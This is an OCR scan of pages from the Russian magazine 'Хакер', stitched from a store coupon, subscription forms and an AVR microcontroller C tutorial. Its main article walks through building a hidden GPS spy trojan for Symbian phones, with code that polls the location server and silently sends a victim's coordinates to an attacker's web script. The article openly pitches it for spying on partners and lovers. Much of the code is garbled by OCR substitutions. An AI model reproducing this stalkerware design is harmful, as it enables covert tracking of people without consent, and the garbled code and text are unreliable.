мне. С удовольствием постараюсь помочь. - !" 
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СОВМЕСТНАЯ АКЦИЯ ЖУРНАЛА ХАКЕР И «КАНТ» 



ЧИТАЕШЬ ЖУРНАЛ ХАКЕР - 

ПОЛУЧИ ПОДАРОК В СПОРТИВНЫХ МАГАЗИНАХ «КАНТ 



СКИДКА НА ЛЮБОЙ 
ТОВАР В ЛЮБОМ 
МАГАЗИНЕ «КАНТ» 



ВЫРЕЖИ ЭТОТ КУПОН, 

ПРИХОДИ В МАГАЗИН И ПОЛУЧИ ПОДАРОК БЕЗ ПОКУПКИ, 

А ТАКЖЕ ДИСКОНТНУЮ КАРТУ 7% НА ВСЕ ПОСЛЕДУЮЩИЕ ПОКУПКИ 



годовых карт 

Огап§е Рііпезз 



горных 
велосипедов 



часов 

Зиипіо 



6000 

фляжек 



4 

ОЧКОВ 



А ТАКЖЕ 

1,5 ТЫСЯЧИ БИЛЕТОВ В КИНО 



И БОЛЕЕ 15 ТЫСЯЧ ДРУГИХ ПРИЗОВ! 




Моснва. 

О нагорная Электролитный проезд, дом 7. корп. 2 
Тел.:81499) 317-6101 
О Полежаевская ул, Куусинена, д, 9 
Тел.: 8 (499) 943 11 55 



Санкт-Петербург 

О Академическая Гражданский проспект д. 23 
Тел : 8 (812) 535 33-91 
О Ломоносовская ул. Ивановская д.7 
Тел.: 8 {812 ) 560-61 00 



Самара. 

Проспект Ленина, дом 1 
Тел.: 8 <846| 338 17 55 
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Следим за местоположением жертв продвинутого телефона 

++++ В мартовском -іг мы подробно рассмотрели разновидности наиболее 
востребованныхтроянов для мобильныхустройств под управлением 
++++ операционной системы ЗутЬіап, а также процесс создания одного из 
— і них. Функционал заключался в сливании бабла со счета пользовате- 
++++ ля. Предлагаю продолжить раскрытие темы, познакомившись с про- 
цессом создания зловредов нового поколения! 



+ + + + 



+ + + + 



+ + + + 



+ + + + 



ЧТО ПИШЕМ? 

В предыдущем материале я писал, что наи- 
более ходовые разновидности шпионского 
ПО для мобильников — это перехватчики 
5ПП5 и программы, отправляющие Ргетіит 
5М5 на короткие номера. Во всяком случае, 
подобное ПО пользуется устойчивым спро- 
сом уже пару лет. Технологии не стоят на 
месте, и с развитием спутниковых систем и 
всеобщего возбуждения на этой почве все 
больше и больше смартфонов оснащаются 
0Р5-приемниками. Было бы странно, если 
бы создатели вредоносного ПО не вос- 
пользовались этой возможностью (с целью 



создания продвинутых шпионов, в реаль- 
ном времени сливающих информацию о 
местонахождении конкретного пользова- 
теля мобильного телефона]. Сразу отмечу, 
что описываемый здесь функционал будет 
работать только на устройствах под управ- 
лением 560 и оснащенных полноценными 
0Р5-приемниками. Методы определения 
местоположения по базовым станциям и 
точкам ѴѴі-Рі на данный момент не могут 
быть использованы для определения 
более-менее точных координат, поэтому мы 
их не рассматриваем. Но чем дальше, тем 
больше моделей оказываются оснащены 



полноценным приемником. Поэтому потен- 
циальный охват поддерживаемых аппара- 
тов внушает оптимизм троянописателям и 
пессимизм обычным пользователям. Итак, 
наша задача — разработать программу, не- 
заметно для жертвы отправляющую данные 
о ее местоположении на сервер. Дальше 
данные обрабатываются и отображаются на 
карте тем или иным образом, в зависимости 
от выбранного картографического серви- 
са. Кстати, можно было бы реализовать 
банальную отправку координат (долго- 
ты и широты] посредством 5М5, но тогда 
пользователю трояна пришлось бы ручками 
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вводить их в картографическом сервисе, 
чтобы определить точку на карте. Это не 
очень удобно. 
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ЗАЧЕМ ЭТО ВООБЩЕ 
НУЖНО? 

Прелесть подобного шпионского ПО в том, что 
потенциальная целевая аудитория покрывает 
нетолько ревнивых мужей и недобросо- 
вестных деловых партнеров (как в случае с 
5ПП5-Ш пиона ми], нои.кпримеру, заботливых 
мамаш, желающихубедиться, что их дитя 
утром идет в школу, а не бухать «ягуар» в 
подъезде пацанами. Подобный софт может 
использоваться и в качестве трекера — напри- 
мер, хозяин «Бентли» может выдать шоферу 
корпоративную мобилу и отслеживать маршрут 
передвижения. Конечно, на рынке присутству- 
юттрекинговые сервисы, но используемыетам 
приложения скрываться не обучены и потому 
заметны в системе. 



хорошая практика разработки как под зутЬіап, 
так и под любую объектно-ориентированную 
систему. Поскольку основная логика работы 
программы у нас содержится в классе АррІІі, 
то, тем самым, мы освобождаем его конструк- 
тор и деструктор от кровавого месива кода, 
отвечающего за инициализацию и настройку 
тайминга. Для обработки события тика тайме- 
ра необходимо унаследовать АррІЭі от класса 
МТітеОиШоббег (смотри заголовочный файл 
Тітег.Ы. Так мы покажем, что АррІІі — это тот 
самый обсервер, который содержит метод, вы- 
зываемый при срабатывании тика. 

сіазз ССрзТг оу АррІІі : риЫіс 
МТітеОиЬЬГоЬіЬіег 
{ 

риЫіс: // Ьгот МТітеОиЬЬГоЬі Ьіег 
ѵоіеі ТітегЕхрігесІЬ ( ) ; //метод, 
вызываемый при тике таймера 




РЕАЛИЗАЦИЯ ПРОГРАММЫ 

Сточки зрения функционала приложения, 
очевидны три основные составляющие: 

• Функционал сокрытия программы в системе; 

• Функционал определения координат; 

• Функционал отправки координат на сервер. 
Первый пункт мы уже освещали, мягко говоря, 
неоднократно. Я рекомендую ознакомиться со 
статьей «Зло-кодинг под ЗутЬіап» в мартов- 
ском номере т . — там этот процесс подробно и 
доступно описан. А мы тем временем сосредо- 
точимся на двух оставшихся компонентах. 



ргіѵаЬе : 

ССрзТгоуТітег* іТітег; //соб- 
ственно, объект таймера 

} 

Теперь в конструкторе СОрзТгоуАррІІі необхо- 
димо лишь создать таймер: 

іТітег = СІІпіТеІТітег : :ЫеідЬ| 
ЕРгіогіЬуЗЬапсіагсІ, *ЬМз); 
іТітег->АЬЬег (КТітеОиЬ ) ; 



ФУНКЦИОНАЛ 
ОПРЕДЕЛЕНИЯ КООРДИНАТ 

Собственно функционал определения коор- 
динат предельно прост— важно определиться 
лишь с логикой их получения и отправки. Для 
ясности изложения я предполагаю, что ты уже 
знаком с основами программирования под 
ЗутЬіап, умеешь использоватьактивные объ- 
екты и можешь создать, например, простей- 
ший таймер. Что касается логики зловреда, 
опять же, для простоты, я предлагаю реализо- 
вать функционал периодического определе- 
ния текущих координатустройства и отправки 
их на сервер. 

Для реализации периодики опроса 0Р5- 
приемника используется обертка вокруг 
стандартного симбиановского класса СТітег. 
По сути, это класс, унаследованный от СТітег 
и содержащий в своем конструкторе все 
необходимые действия по инициализации и 
настройке таймера. Также членом оберточного 
класса является ссылка на объектобсервера 
(ОЬзегѵег), который ответственен за выпол- 
нение действий по событию срабатывания 
таймера. Полный код класса ССрзТгоуТітег 
находится на нашем диске. Здесь мы его не 
будем приводить, поскольку он довольно три- 
виален. Кстати, создание подобных оберточ- 
ных классов над стандартными системными — 



- и реализовать метод ТітегЕхрігесН) пример- 
но следующим образом: 

ѵзіЫ ССрзТг оу АррІІі : : ТітегЕхрігесІЬ ( ) 
{ 

СеЬРозіЬіоп ( ) ; 
іТітег->АЬЬег (КТітеОиЬ ) ; 

} 

Здесь мы выполнили метод ѲеіРозіБюпО, 
отвечающий за определение координат 
устройства, и заново запустили таймер, чтобы 
обеспечить периодичность определения 
местоположения. 

Перейдем к функционалу определения 
координат. Для этого нам понадобится ис- 
пользовать объекты классов РРозібопЗегѵег, 
РРозіЬопег, ТРозіЬопІпФ и ТРозіЬоп. Рассмот- 
рим каждый из них чуть подробнее: 

• РРозіЬопЗегѵег — основной интерфейс 

к БосаЬоп Зегѵег. В свою очередь, БосаЬоп 
Зегѵег — это такой процесс, который от- 
вечаетза обработку клиентских обращений 
приложений кбазовой функциональности 
ОРЗ-приемника. РРозіЬопЗегѵег служит для 
установки соединения с БосаЬоп Зегѵег и по- 
лучения соответствующего хэндла ресурса. 

• РРозіЬопег — открывает субсессию к 
БосаЬоп Зегѵег, которая уже используется 




аозѵігззде 



для получения координат. Крометого, объект 
класса РРозіЬопег содержит информацию о 
последней полученной позиции, а также — о 
частоте опроса ОРЗ-приемника. 

• ТРозіЬопІпФ — структура, содержащую пол- 
ную информацию, полученную отспутников. 

• ТРозіЬоп -структура, содержащая инфор- 
мацию о координатах устройства (долгота, 
широта, высота, скорость и т.д.) и скорости его 
передвижения. 

Более детальное описание классов можно (и 
нужно] посмотреть в ЗЭК. Если обобщить, то 
код упомянутого метода ОеіРозіЬоп может вы- 
глядеть примерно так: 

ІІзег: : ЬеаѵеІЬЕггог ( 

іРозіЬіопЗегѵег . СоппесЬ ( ) ) ; 

ІІзег: : ЬеаѵеІ ЬЕггог ( іРозіЬіопег . 
Ореп (ІРозіЬіопЗегѵег) ) ; 

ІІзег : : ЬеаѵеІ ЬЕггог ( 

ІРозіЬіопег. ЗеЬКедиезЬог ( 
СКедиезЬог: : ЕКедиезЬогЗегѵісе , 
СКедиезЬог: : ЕЕогтаЬАррІісаЬіоп , 
ККедиезЬог) ) ; 
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ТРозіЬіопІІрсІаЬеОрЬіопз 
ирсІаЬеОрЬіопз ; 

ирсІаЬеОрЬіопз . ЗеЫІрсІаЬеІпЬегѵаІ ( 
КІІрЫаЬеІпЬегѵаІ ) ; 
ирсІаЬеОрЬіопз . ЗеЫІрЫаЬеТітеОиЬ ( 
КІІрЫаЬеТітеоиЬ ) ; 

ІІзег : : ЬеаѵеІЬЕггог ( 

ІРозіЬіопег. ЗеЫІрсІаЬеОрЬіопз ( 
ирсІаЬеОрЬіопз) ) ; 

Сапсеі ( ) ; 

іРозіЬіопег . ЬГоЬіЬуРозіЬіопІІрсІаЬе ( 
іРозіЬіопіпЬо , іЗЬаЬиз ) ; 

ЗеЬАсЬіѵе ( ) ; 

Объяснять нечего — код смело можно отнести 
ксамодокументированным. Обрати внимание, 
что запрос на получение координат может вы- 
полняться довольно долго, поэтому запускает- 
ся на выполнение асинхронно. Этозначит, что 
класс СбрзТгоуАррБі необходимо унаследо- 
вать от САсЬѵе и реализовать метод ВипІ_(]. 
Именно он будет выполняться при получении 
координат. 

ѵэісі ССрзТгоуАррІІі : : КипЬ ( ) 

{ 

зхѵіЬсіі (ІЗЬ аЬиз . ІпЬ ( ) ) 

{ 

сазе КЕггЫопе: 

{ 

//координаты успешно получены 
ТРозіЬіоп розіЬіоп; 
ІРозіЬіопіпЬо . СеЬРозіЬіоп ( 
розіЬіоп) ; 

ТІпЬ ІаЬіЬиЫе = 

розіЬіоп . ЬаЬіЬисіе ( ) ; 
//получаем широту 
ТІпЬ ІопдіЬисІе = 
розіЬіоп. ЬопдіЬисІе ( ) ; 
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ПРОТРОЯНЕННЫЙ ЧЛЕН Х-СРЕѴѴ ВПОЛНЕ МОГ БЫ ДА, Я ХОЧУ РАЗРАБАТЫВАТЬ МОБИЛЬНЫЕ ПРИЛО- 

ІРГ 3 ВЫДАТЬ МЕСТОПОЛОЖЕНИЕ НАШЕЙ РЕДАКЦИИ :) ЖЕНИЯ 
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//получаем долготу 

Зепс1.Соогс1іпа1:еІ< ( Іакікисіе , Іопдікисіе) ; 

//отправляем данные 

Ьгеак; 

} 

сіеіаиік : 

//координаты не получены, пробуем снова 
іРозібіопег .ЫобібуРозібіопІІрбабе ( 
іРозікіопІпіо , іЗДакиз ) ; 

ЗекАсДіѵе ( ) ; 

Ьгеак; 



} 



} 



Здесь в случае успешного завершения операции мы отправляем дан- 
ные на сервер посредством функции ЗепсІСоогсІіпаІеКіпІ.іпІ;). 

ФУНКЦИОНАЛ ОТПРАВКИ 
КООРДИНАТ НА СЕРВЕР 

В каком виде отправлять данные на сервер? Это зависит от конкрет- 
ной реализации серверной части, агрегирующей данные от мобилы и 
отображающей их пользователю/злоумышленнику. Поскольку самое 
очевидное решение — использовать боодіе Марз АР I, учти, что на 
сервере нам необходимо реализовать веб-приложение, которое че- 
рез ЭаѵаЗсгірТ взаимодействуете Ооодіе Марз, передает координаты 
точки и отображает картинку с нарисованным флажком на карте. Ин- 
терфейса для непосредственного доступа к боодіе Марз с мобилы нет, 
нужно реализовать некое промежуточное звено, передающее коор- 
динаты от мобилы к веб-приложению. Тут можно дать волю фантазии 
и реализовать каксложную серверную часть (демон, слушающий на 
определенном порту данные от смартфона], так и простенький скрипт 
на рбр, обрабатывающий банальные роз!- или даже деі-данные. Как 
непрофессионал в веб-программировании, я бы выбрал вариант 
обычного обращения мобилы к удален но му скрипту по ссылке вида 
ЬИр ://уои гЬозІ:. ги/зегі р!:з/1: гоу. рЬр?1опд И:исІе=ххх& Іа1:М:исІе=ууу. А 
далее — полученные координаты обрабатываем скриптами и делаем 
сними, что хотим. Кстати, аналогичный Ооодіе Марз сервис стали 
предоставлять Яндекс и даже ІМокіа, поэтому определенная свобода 
выбора есть, и реализация серверной части — дело техники. Не будем 
подробно касаться здесь аспектов ее разработки, ибо это тема, как 
минимум, для отдельной статьи. 

Сосредоточимся на механизме отправки данных на сервер по- 
средством НТТР оѵегТСР. На диске к журналу находятся исходники 
класса СНТТРЕпдіпе, реализующего функционал ОЕТ- и Р05Т- 
запросов. Как и в случае с СТгоуТітег, он содержит переменную- 
член, являющуюся ссылкой на объект-обсервер событий, которым 
снова стал ССрзТгоуАррІЛ, наследуемый от МНТТРЕпдіпеОЬзегѵег и 
получающий методы, вызываемые при получении ответа от сер- 



вера и завершения запроса. Кстати, СНТТРЕпдіпе — это готовый к 
использованию универсальный и хорошо зарекомендовавший себя 
движок ЫТр! 

СНТТРЕпдіпе наследуется от класса МНТТРТгапзасбопСаІІЬаск. Тот 
задаетему свойства класса, относящегося кактивным объектам, рас- 
ширяя стандартную функциональность САсбѵе. Крометого, механизм 
инициализации СНТТРЕпдіпе схож с функционалом определения коор- 
динатв планетого, что описывается тем же законом клиент-серверного 
взаимодействия внутри ОС: сначала создается сессия к Соттипісаііоп 
Эегѵег, потом ее хэндл используется для уже реального обращения к 
сотт зегѵег’у и выполнения необходимой работы. 

С учетом описанной нами довольно общей концепции передачи данных 
на сервер реальный механизм отправки координаты может выглядеть 
примернотак: 

ѵоіеі ССрзТгоуАррІЛ : : ЗепсЛоогсЛпакеЬ 
(Тіпк ІаДікисІе , Тіпк Іопдікисіе) 

{ 

СНТТРЕпдіпе* ЫЛрЕпдіпе = СННТРЕпдіпе : :Ые\лЩ (ДМз) ; 
ТВи1<64> игі (_Ь 

( "ЫЛр : //Тюзк/кгоузскірк . ркр?1опдікис1е= ")); 
игі . АррепсШшп ( ІакіДисІе) ; 
игі . Аррепсі (_Іі ( "^ЛаСШисТ^" ) ) ; 
игі . АрретіИит ( Іопдікисіе) ; 

ТШкрЕпдіпе->СекКедиезкЕ (игі ) ; 

} 

Все, данные отправлены. 

Естественно, здесь мы не рассмотрели подробно механизм реализации 
движка, я лишь показал общую концепцию. Поэтому, как и в любой за- 
дачи по разработке под ЗутЬіап.тебе придется почитать документацию 
и посмотреть пример с диска. 

ЗАКЛЮЧЕНИЕ 

Эта концепция создания СР5-трояна, без сомнения, оставляет опреде- 
ленный творческий простор. Мы не стали специально рассматривать 
архитектуру взаимодействия мобильного приложения и сервера, 
поскольку тут возможна масса вариантов: конкретная реализация во 
многом зависит от целого ряда факторов. Что касается реального при- 
менения, то автору приходилось встречать случаи, когда подобный софт 
устанавливался каклюбовницам, так и деловым партнерам. Нохотя 
определеннаятенденция к распространению прослеживается, в оче- 
редной раз напоминаем, что это может привести к довольно печальным 
последствиям. Создание вредоносного ПО нетолько не пропагандиру- 
ется нашей статьей, но даже и не описывается! Сам подумай, чтожтако- 
го, — изучили взаимодействие с СР5, координаты получать научились; 
какотправлять — с некоторой натяжкой разобрались. Ауж как все эти 
знания применить на практике —тебе решать. Удачи! ~и~ 
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Подписка на журнал «ХАКЕР+ОѴР» на 6 месяцев 
стоит 1200 руб. 



По всем вогтоосам 




ГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 

2100 руб. (на 15% дешевле чем 
при покупке в розницу) 



Единая цена по всей России. Доставка за счет издателя, 
в том числе курьером по Москве в пределах МКАД 



ВНИМАНИЕ! 

ВТОРОЕ СПЕЦПРЕДЛОЖЕНИЕ! 

При подписке на комплект журналов 

ЖЕЛЕЗО + ХАКЕР + ОШ 

- Один номер всего за 1 55 рублей (на 25% дешевле, чем в розницу) 

ЗА 12 МЕСЯЦЕВ ЗА 6 МЕСЯЦЕВ 



ВЫГОДА • ГАРАНТИЯ • СЕРВИС 

КАК ОФОРМИТЬ ЗАКАЗ 

1. Разборчиво заполните подписной купон и квитанцию, вырезав 
их из журнала, сделав ксерокопию или распечатав с сайта ѵѵѵѵѵѵ. 
діс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купона и 
квитанции — любым из нижеперечисленных способов: 

• по электронной почте $иЬ$сгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва, 

ул. Тимура Фрунзе, д. 11, стр. 44, 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! 

Подписка оформляется в день обработки купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных документов в 
редакцию по факсу или электронной почте; 

• в течение 20 рабочих дней после отправки подписных документов по 
почтовому адресу редакции. 

Рекомендуем использовать факс или электронную почту, в последнем 
случае предварительно отсканировав или сфотографировав документы. 
Подписка оформляется с номера, выходящего через один кален- 
дарный месяц после оплаты. Например, если вы производите оплату в , 
апреле, то журнал будете получать с июня. 



связанным с подпиской, звоните по бесплатным телефонам 8(495)780-88-29 (для москвичей) 
и 8(800)200-3-999 (для жителей других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). Вопросы 
о подписке можно также направлять по адресу іпІо@дІс.ги или прояснить на сайте ѵѵѵуѵу.СИС.ги 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ « 



□ на 6 месяцев 

□ на 12 месяцев 



начиная с 



.200 г. 



і— I Доставлять журнал по почте 
* на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

□ на домашний адрес** 



(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 



область/край 



город 



улица 



дом 



корпус 



квартира/офис 



телефон ( 



е-таіі 



сумма оплаты 



*в свободном поле укажи название фирмы 
и другую необходимую информацию 
*в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 



свободное поле 



Извещение 



Кассир 



Квитанция 



Кассир 



ИНН 



7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 



р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИ К 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


200 г. 





Ф.И.О. 



Подпись плательщика 



ИНН 



7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 



р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


200 г. 





Ф.И.О. 



Подпись плательщика 






рЬгеакіпд 
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АЛЕКСЕЙ «С ИЛ5ТЕР» АВДЮХИН / СІ.и5ТЕКККгаСІ.и5ТЕККК.С0М / 









ВЫСОКИЙ УРОВЕНЬ 
ПРОГРАММИРОВАНИЯ 



Пишем на Си под АѴГС 



Программисты микроконтроллеров всегда делились на тех, кто пишет 
на ассемблере, и тех, кто предпочитает высокоуровневые языки про- 
граммирования. Обе группы готовы бесконечно доказывать, что их 
язык лучше. И каждая права по-своему. Ассемблер обычно использу- 
ют профессионалы, которые давно знакомы с микроконтроллерами. 
Но зачем учить язык тем, кто только начинает осваивать новую архи- 
тектуру? Я расскажу, как программировать на Си под микроконтрол- 
леры АѴР. 



ВЫБОР КОМПИЛЯТОРА 

Существует несколько компиляторов Си под АѴР, включая официаль- 
ный отАітеІ. Я предпочитаю использовать ѴѴіпАѴР (произносится, как 
«ѵѵбепеѵег»). Этот пакет представляет набор бесплатных утилит под 
винду, включая компилятор АѴР-6СС, консольный отладчик и даже софт 
для прошивки, который умеет работать с самыми разными программато- 
рами. Далее я буду рассматривать именно ѴѴіпАѴР, поэтому рекомендую 
установить его. Домашняя страничка проекта находится по адресу: 
ЬирУ/ѵѵіпаѵг.зоигсеіюгде.пеС ноты можешь взять свежую версию на 
нашем диске. Обрати внимание, что почти все утилиты в этом пакете 
консольные. Если ты уже знаком сОСС.тотебе не привыкать. Можно 
использовать для него соответствующую оболочку-редактор. Именно 
для таких целей в комплекте идет Ргодгаттег’з І\Іо1:ерасІ. Я же предпо- 
читаю писать код в обычном текстовом редакторе и компилировать его 
командой «таке». Это дело вкуса и привычки. 

РЕГИСТРЫ, РЕГИСТРЫ, РЕГИСТРЫ... 

Неоспоримое преимущество Си в переносимости. Один итотже код 
зачастую можно легко скомпилировать под разные платформы. Однако 
программе нужно как-то взаимодействовать с внешним миром, которым 
является операционная система или аппаратная часть. В случае с 
софтом под ѴѴі псІо\л/5 и *піх для этого используются вызовы системных 
функций. В микроконтроллерахже нетоперационной системы, и мы 
будем напрямую взаимодействовать с железом. Делается это с помощью 



регистров, которые, по сути, являются ячейками в памяти микроконт- 
роллера. Так, если ты хочешь работать с модулями микроконтроллера, 
будьто таймеры, компараторы, ІІ5АРТ или просто ноги, тебе придется 
писать данные в регистры. Этим я хочу сказать, что еслиты уже сейчас 
без проблем кодишь на Си, то единственное, что тебе осталось изучить 
— это регистры микроконтроллера. У каждой АВРки они свои. Список и 
подробное описаниеты сможешь найти в соответствующем даташите. 
Однако базовые принципы для каждой модели очень похожи. Давай рас- 
смотрим основные регистры, с которымиты, наверняка, будешь играться 
в первую очередь: ОЭРх, РОРТх и РІЫх. Отвечаютони непосредственно 
за управление ногами микроконтроллера. 

Немного поясню для тех, кто не в теме. В каждой АВРке все ноги делятся 
на порты, которые обозначаются латинскими буквами А, В, С и т.д. Каж- 
дый может содержать до восьми ног, которые номеруются цифрами отО 
до 7. Скачай даташитксвоему микроконтроллеру. На первых страницах 
ты найдешь рисунокс распиновкой, где подписано, какая нога за что 
отвечает. Обрати внимание на надписитипа РВО, РС1 ит.п. Именноони 
указывают букву порта и номер ноги. Например, строка «РА7» означа- 
ет, что мы имеем дело с седьмой ногой на порту А. Существует набор 
регистров ОЭРх, РОРТх и РІЫх, которые у каждого порта свои. Соответс- 
твенно, вместо «х» нужно подставить соответствующую букву. Например, 
для управления портом «В» используются регистры ОЭРВ, РОРТВ и 
РІ N В. Каждый из них размером всего в 1 байт. Нетрудно догадаться, что 
каждый бит при этом отвечаетза соответствующую ногу. 
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«ПИШЕМ НА СИ ПОД АѴР» 



УСТРОЙСТВОС ДИСПЛЕЕМ ВДЕЙСТВИИ 




Итак, ООРх регистры определяют направление данных — ввод или вы- 
вод. РОРТх позволяютзадать состояние ноги — логическая единица или 
логический ноль, а также включать подтягивающий резистор. Регистры 
РІЫх рассчитаны только на чтение и позволяютопределить уровень на 
ноге, когда она работает на ввод. 

Ну, хватит нудной теории. Рекомендую внимательно почитать дата шиты, 
а пока разберем простейший пример: 

Моргаем светодиодом 

Мебіпе Р_СРІІ 80000001Ш 
#іпс1исіе <аѵг/іо.1т> 

#іпс1исІе сиСіІ/сіеІау . 1і> 
іпС гпаіп (ѵоіб) 

{ 

ББКВ Щ ( 1 « 2 ) ; 
мМІе (1) 

{ 

РОКТВ | = ( 1 « 2 ) ; 

_сіе1ау_шз (100) ; 

РОКТВ &= ~ ( 1 « 2 ) ; 

_бе1ау_тз (100) ; 

} 

геСшгп 0 ; 

} 

В первой строке определяется тактовая частота, на которой будет 
работать микроконтроллер. Это необходимо для корректной работы 
некоторых функций. Далее мы подключаем модули. 

ѴѴіпАѴР идете очень широким набором заголовочных файлов, в которых 
описывается все, что может понадобиться при работе с самыми разными 
АВРками. Файл «іо.Ь» содержит список всех регистров для соответст- 
вующего микроконтроллера, модель которого обычно определяется в 
файле «такеіііе». Надеюсь, чтоты уже умеешь писать мейкфайлы. Но на 
самом деле, это необязательно, ведь можно без проблем пользоваться 
готовым шаблоном, который ты найдешь в примерах. Заголовочный 
файл «беІау.Ь» содержит функции задержек. Функция «таіп»уже 
должна быть знакома тем, кто пишет на Си. Именно тут начинается наша 
программа. Обрати внимание, что параметры командной строки не 
передаются. Да и откуда им взяться? :) 

Теперь начинается самое интересное. Строка «ООВВ |= (1 << 2]» выстав- 
ляет второй бит (отсчет идет от нуля!) в регистре 0 ОВ В равным единице. 
Знающие Си не увидят тут ничего сложного. Для остальных поясню, что 
оператор «<<» выполняет битовый сдвиг влево, то есть выражение «1 
<< 2» равно числу 4, которое в двоичной системе выглядит как«1 00». 
Строку можно записать та ким образом: ООВВ = ООВВ I ОЬОООО0 1 00. 
Выполняетона следующее: беретзначение регистра ООПВ, произво- 



дит логическое сложение его с числом 4 и записывает результат назад 
вООРВ. После этой простой операции в регистре изменяется только 
второй бит; его значение становится равным единице. Первоначальная 
запись выглядит красивее, если ты знаешь язык. В этом и заключается 
прелесть Си — коротким выражением можно записать достаточно хит- 
рый код (надо знать этотязык, если хочешьтакое понимать]. 

Но не будем углубляться вуроки Си. Логическая единица во втором 
бите регистра ООРВ означает, что вторая нога порта «В»теперь будет 
работать на вывод. Далее по коду идет бесконечный цикл, в котором 
мы работаем уже с регистром РОРТВ, изменяя его второй бит, а вместе 
с ним — и напряжение на второй ноге порта «В». Можешь смело взять 
светодиод, подключить его к РВ2 и проверить — он будет мигать каждые 
1 00 миллисекунд. Этим простым примером я хочу показать, что, если ты 
знаешь Си, то сможешьуже сейчас легко написатьсвою первую про- 
грамму для АѴР, которая будет мигать светодиодом. Наверное, именно 
стакой «дискотеки» все и начинали; это своеобразный «Неііо ѴѴогШ» в 
мире микроконтроллеров. И он очень радует. 

ПРЕРЫВАНИЯ 

При прямой работе сжелезом без прерываний не обойтись. В свое 
время эта тема казалась мне весьма сложной, а слово «прерывание» 
даже немного пугало, ведь я не понимал его значения. На деле, все 
очень просто. Это часть программы, которая автоматически вызывается 
в заданный момент. Когда пишем на Си, прерывания выглядят почти как 
обычные функции. Полный их список, значения и инструкции по исполь- 
зованиюты всегда можешь найти в даташите. В качестве простейшего 
примера возьмем получение данных из СЭАВТ-порта. 

Чтение данных 

#іпс1исіе <аѵг/іо.Ъ> 

#іпс1ис!е <аѵг/іпСеггирЦ . Ь> 

ІЗК (иЗАКТ_ЕХС_ѵесС ) 

{ 

іпС Ъ; 

// Получаем данные 

Ь = ШК; 

// Тут мы их обрабатываем 

} 

Функция-прерывание обозначается словом «І5Р», в скобках после 
которого идет имя вектора прерывания. В примере это «ІІ5АПТ_ВХС», 
он вызывается, когда завершено получение данных из ІІЭАВТ-порта. 
Однако прерывание не будет вызываться, если микроконтроллеру это- 
го не указать. В нашем случае тут используется бит РХСІЕ в регистре 
ІІС5ВВ. В итоге, инициализация С5АВТ порта делается следующим 
образом: 
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Никогда не ленись читать даташиты. 
В технической документации всегда 
подробно описано, как пользоваться 
соответствующим устройством. Там 
ты найдешь и регистры для АВРок, 
и команды для дисплея со всеми 



соответствующими примерами и 
описаниями. Это действительно 
очень подробная и ценная информа- 
ция; осталось только согласовать ее 
с тем, что ты уже знаешь. Не бойся 
экспериментировать! 



проводов и выделил под него отдельный порт. 

Не буду глубоко вдаваться в принципы работы с дисплеем. 
Это широкая тема, поэтому мы возьмем один из готовых 
модулей. Общая схема работы программы будет достаточно 
простая... Получаем данные от компьютера и заносим их в 
буфер. Если пришел символ конца строки, то сразу же выво- 
дим содержимое буфера на экран. 

Приступим! Начнем с определения необходимых констант. 
Для удобства их лучше вынести в отдельный заголовочный 
файл, — назовем его «бебпез.Ь». 

Определения констант 

// Тактовая частота 
#сІеІ:іпе Е_СРІІ 8000 0001Ш 
// Скорость II 8 АКТ порта 
#йеРіпе ІІАКТ_ВАШ 9 600 




> СІѴСІ 



На дискеты найдешь 
все исходники, 
а также сам ѴѴіпАѴР, 
с помощью которого 
они компилируются. 



ѵоісі ІІ8АКТ_іпіС (ѵоісі) 

{ 

#іі Е_СРІІ < 2 0000001Ш && сіеііпесі (ІІ2Х) 

ІІСЗКА = _ВѴ(ШХ) ; 

ІІВККЬ = (Р_СРІІ / ( 8іЛі * ІІАКТ_ВАГО) ) - 1; 

#е1зе 

іівккь = (р_сріі / (ібііь * ііакт_ваеш ) } — і; 
#епсііР 

ІІСЗКВ = (1 « ТХЕЫ) | (1 « КХЕЫ) ; 

ІІСЗВВ |= СІ « КХСІЕ) ; 

зеі ( ) ; 

} 

Много новыхи непонятных слов? Смотри ихописание в дата- 
шите! Код инициализирует ІІ5АРТ-порт для работы на скоро- 
сти в ПАНТ_ВАШ бод; соответственно, нужно заранее задать 
эту константу. И да, каждый бит в регистре тоже имеет свое 
название для удобства работы. Нас особенно интересуют 
последние две строки. Простой код«ІІС5РВ |=(1 << ВХСІЕ]» 
делаетто, о чем я написал выше — устанавливает бит РХСІЕ 
равным единице. Именно это говорит микроконтроллеру 
отом, что нужно вызывать прерывание. Функция зеі(] дает 
процессору команду отом, что теперь надо обрабатывать пре- 
рывания. Фактически зеі() просто включаетвсе прерывания. 
Ее обязательно надо вызвать, чтобы они начали работать. Су- 
ществует и обратная функция — еЩ). Использовать ее стоит, 
если ты хочешь отключить сразу все прерывания. Иногда это 
может Ьытъ полезно [аналогичные команды существуют в 
ассемблере , сП и зеі , — Прим, сШпу]]. Обрати внимание, 
если ты не опишешь функцию для прерывания и выполнишь 
ІІ5АВТ_іпі1;(], в которой оно разрешается, результат будет 
непредсказуемым. Такделать нельзя. 



// Ноги, куда подключен дисплей 
#сіе^іпе НБ4 47 8 0_РОКТ В 
#<іе^іпе НБ447 80_К8 РОКТб 
#с!е:Еіпе НБ447 80_КМ РОКТ4 
Меііпе НБ44780_Е РОКТБ 
#с!е:Еіпе НБ44780_Б4 РОКТО 
